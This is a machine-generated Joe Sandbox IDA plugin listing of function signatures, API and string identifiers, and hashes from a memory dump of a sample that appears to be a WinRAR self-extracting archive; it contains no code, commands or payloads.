                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastProcess_invalid_parameter_noinfo_noreturn$CloseCurrentHandleOpenToken
                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                  • API String ID: 4085542508-639343689
                                                  • Opcode ID: 56eb12e04902f8cdd3d9974dd122819d94118814fcd2e4f07e3976d6fdbba36c
                                                  • Instruction ID: db8e18866117d999dd6d4b4f0aa3fd16a172bcf2985a2b5fb06b2e3341705f3f
                                                  • Opcode Fuzzy Hash: 56eb12e04902f8cdd3d9974dd122819d94118814fcd2e4f07e3976d6fdbba36c
                                                  • Instruction Fuzzy Hash: 9251E852F28A5155FB10EFA5F8661BD2360AF857AAF000175DD9DD36A7DE3CA886C200
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Rect
                                                  • String ID: RarHtmlClassName
                                                  • API String ID: 2396740005-1658105358
                                                  • Opcode ID: 953af82ac97f53ff3664e5cae13e18f5e39b1284c961c4c0c6c177a49c08ee6a
                                                  • Instruction ID: 50bf3c6f6a34f280704d0005b2736733942b8fdc15fc70ee0e4bc6769806fc31
                                                  • Opcode Fuzzy Hash: 953af82ac97f53ff3664e5cae13e18f5e39b1284c961c4c0c6c177a49c08ee6a
                                                  • Instruction Fuzzy Hash: A7518321A18B828AEA249F26F46537A77A0FB85782F044575DECEC7B56DF3CE0468740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                  • String ID: sfxcmd$sfxpar
                                                  • API String ID: 3540648995-3493335439
                                                  • Opcode ID: 3f2466e4a4d0866a754e80d9881e3536653d903d5d2b18ad3a3031b9ab7b11ad
                                                  • Instruction ID: a0c49159825ba54436c82f332e05dbaa26e6dedadec71d4192294c834a921f8b
                                                  • Opcode Fuzzy Hash: 3f2466e4a4d0866a754e80d9881e3536653d903d5d2b18ad3a3031b9ab7b11ad
                                                  • Instruction Fuzzy Hash: 27318332A24A4584EB04CF69F8A51AC3371FB48B99F540176DE9ED77AADF38D082C344
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                  • API String ID: 0-56093855
                                                  • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                  • Instruction ID: 9e92ce899c858443fcbc1afa19897196dd075e2424bac4bc52d7883a36503add
                                                  • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                  • Instruction Fuzzy Hash: 31213B3191CB4780FA108F96F86917427A0BB49B86F5405B7D9CEC3762CE3CE5A68380
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                  • Instruction ID: f86de02145837f429a8ca64a88613292cc5a4128aa051cfab7ee6e8e800e4ef1
                                                  • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                  • Instruction Fuzzy Hash: 03F06221A29A8281EF588F51F8642796360EF8C7D2F485079E98FC7665DF3CE486C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                  • Instruction ID: 956ff7f84daff5dcf9ebe63535531fd5f906ed48c59251f009bde341b08982d8
                                                  • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                  • Instruction Fuzzy Hash: 6A81F322F186824EFB149FA5A8606BD2AA0BB55B8AF0041B5DD8FD3695DF3CE447C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 2398171386-0
                                                  • Opcode ID: f75a2e2a3a1635b10ac7663bc56c733a9042ffa6b3fef8e66de610f6d5e077c2
                                                  • Instruction ID: 0e90ad692fe866f0105c43376b1c67067eb017856934fb1295283a1c606561de
                                                  • Opcode Fuzzy Hash: f75a2e2a3a1635b10ac7663bc56c733a9042ffa6b3fef8e66de610f6d5e077c2
                                                  • Instruction Fuzzy Hash: 2E51C122F24A4259FB508FB5F8612BE23B1AB487AAF004675DE9DC76D6DF3C9485C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                  • String ID:
                                                  • API String ID: 3659116390-0
                                                  • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                  • Instruction ID: bb42f888778900f1fed3088a4eb4c697b36fd620254c2611f6b46857fea45e9a
                                                  • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                  • Instruction Fuzzy Hash: C451B232A14A918AF710CFA5E8543AC3BB1FB58B99F048175DE8E97B99DF38D146C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocString
                                                  • String ID:
                                                  • API String ID: 262959230-0
                                                  • Opcode ID: 7e9601d2247a13adf5892490d0984888a090eff7ba9d3fa4ff308a8b8e371313
                                                  • Instruction ID: 1f6697b5847ff7603f4de2382566ee5bad0ce01fdd45b474b3e0d606738a985e
                                                  • Opcode Fuzzy Hash: 7e9601d2247a13adf5892490d0984888a090eff7ba9d3fa4ff308a8b8e371313
                                                  • Instruction Fuzzy Hash: D541D831A2964689EB149F65BC6137822A0EF08BA5F244678FBAEC77D6DF3CD0418340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AddressProc
                                                  • String ID:
                                                  • API String ID: 190572456-0
                                                  • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                  • Instruction ID: 67cc2010e3d046d15052e4e55f4125804c32e837723f8457fa80421215021f31
                                                  • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                  • Instruction Fuzzy Hash: 33413722B29A4281FE158F56BD255752395BF08BD1F094579EE9FCB795EF3CE0018340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                  • Instruction ID: 4055e559c94920f52ddfabf1c597ecaa86035ddc9d18d2b33ebc5cc2a50da2d0
                                                  • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                  • Instruction Fuzzy Hash: F011C436E1C68781F65409A4F67537909416F453A2F58CAB0EAFF875D6CF2CA8436105
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: __except_validate_context_recordabort
                                                  • String ID: csm$csm
                                                  • API String ID: 746414643-3733052814
                                                  • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                  • Instruction ID: 5022913aca20a4b3eb4a879f1900ab0b03138f59467fb2dea4966639661f40aa
                                                  • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                  • Instruction Fuzzy Hash: 247192726187C186D7609F25A8617BDBBA0EB05B8AF048179EFCCC7A86DF2CD491C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: $*
                                                  • API String ID: 3215553584-3982473090
                                                  • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                  • Instruction ID: 90a03a65e0ed98d449970783f30dc405f171d90b0ee153c3b73718e03213a4af
                                                  • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                  • Instruction Fuzzy Hash: 92516B7292C6428AEBE48E28AC6E3BC3760FB15B5AF14517DE6C9C119ACF38F441C605
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$StringType
                                                  • String ID: $%s
                                                  • API String ID: 3586891840-3791308623
                                                  • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                  • Instruction ID: 6871518134671d720d9f1b2d82831f8e69d6051e18f361ef4eb56c81151783f5
                                                  • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                  • Instruction Fuzzy Hash: 3441A422B15B818AEB208F65E8503F96391FB44BA9F480675EE9F877D5DF3CE5468300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                  • String ID: csm
                                                  • API String ID: 2466640111-1018135373
                                                  • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                  • Instruction ID: aa86c32cc6bfe000ea047e4cc2d5f5e6d68f50d602a3e2826a6889169c178154
                                                  • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                  • Instruction Fuzzy Hash: A6514E7262878187DA20DF15B8522AE77A4F789B91F140178EBCDC7B56CF38E450CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                  • String ID: U
                                                  • API String ID: 2456169464-4171548499
                                                  • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                  • Instruction ID: 3d4e6d3db7c959eb47553c5a476373fa88b3d69913c999a62002850e300a9144
                                                  • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                  • Instruction Fuzzy Hash: 7D41B222A28A8186EB208F65F8543BA77A0FB98795F444131EE8EC7798DF7CD442C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ObjectRelease
                                                  • String ID:
                                                  • API String ID: 1429681911-3916222277
                                                  • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                  • Instruction ID: 82d7f27b8b92c908fdecbba13803dc5722ae6a30bd0bea954b35845556d50bcd
                                                  • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                  • Instruction Fuzzy Hash: 8F315C3560874186EA548F53B828A6ABB70F788FD2F005535ED8E83B54CE3CD09ACB00
                                                  APIs
                                                  • InitializeCriticalSection.KERNEL32(?,?,?,00007FF6CA9E317F,?,?,00001000,00007FF6CA9CE51D), ref: 00007FF6CA9DE8BB
                                                  • CreateSemaphoreW.KERNEL32(?,?,?,00007FF6CA9E317F,?,?,00001000,00007FF6CA9CE51D), ref: 00007FF6CA9DE8CB
                                                  • CreateEventW.KERNEL32(?,?,?,00007FF6CA9E317F,?,?,00001000,00007FF6CA9CE51D), ref: 00007FF6CA9DE8E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                  • String ID: Thread pool initialization failed.
                                                  • API String ID: 3340455307-2182114853
                                                  • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                  • Instruction ID: 3f3f3a77053cf51f2cc1feb82fd310a1726b8f458b63971c0b349bd79c286180
                                                  • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                  • Instruction Fuzzy Hash: FE210832E1564186F7148F65F4653AD32A1EF98B0EF188034CA8DCB286CF7E9896C784
